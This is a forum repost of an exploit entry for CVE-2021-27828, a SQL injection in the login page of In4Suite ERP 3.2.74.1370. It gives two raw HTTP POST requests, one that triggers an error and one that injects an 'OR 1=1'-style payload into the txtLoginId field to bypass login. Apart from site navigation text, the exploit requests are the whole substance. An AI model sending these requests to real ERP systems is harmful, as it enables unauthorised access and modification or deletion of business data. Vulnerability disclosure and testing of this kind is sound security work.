In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection

HACK1949 · 2022年11月4日

# Exploit Title: In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection
# Date: 18/05/2021
# Exploit Author: Gulab Mondal
# Vendor Homepage: https://www.in4velocity.com/in4suite-erp.html
# Version: In4Suite ERP 3.2.74.1370
# Tested on: Windows
# CVE: CVE-2021-27828

-----------------------------------------

SQL injection in In4Suite ERP 3.2.74.1370 allows remote attackers to
modify or delete data, causing persistent changes to the application's
content or behavior by using malicious SQL queries.

--------------


# Error condition
POST /CheckLogin.asp HTTP/1.1
Host: 127.0.0.1

txtLoginId=admin&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt=" "

# SQL Injection exploitation
POST /CheckLogin.asp HTTP/1.1
Host: 127.0.0.1

txtLoginId=admin OR '1=1&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt="

------------------------------

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection

推荐的帖子

HACK1949

链接帖子

意见的链接

分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

最近浏览 0位会员

黑客世界站内导航 (SITE MAP)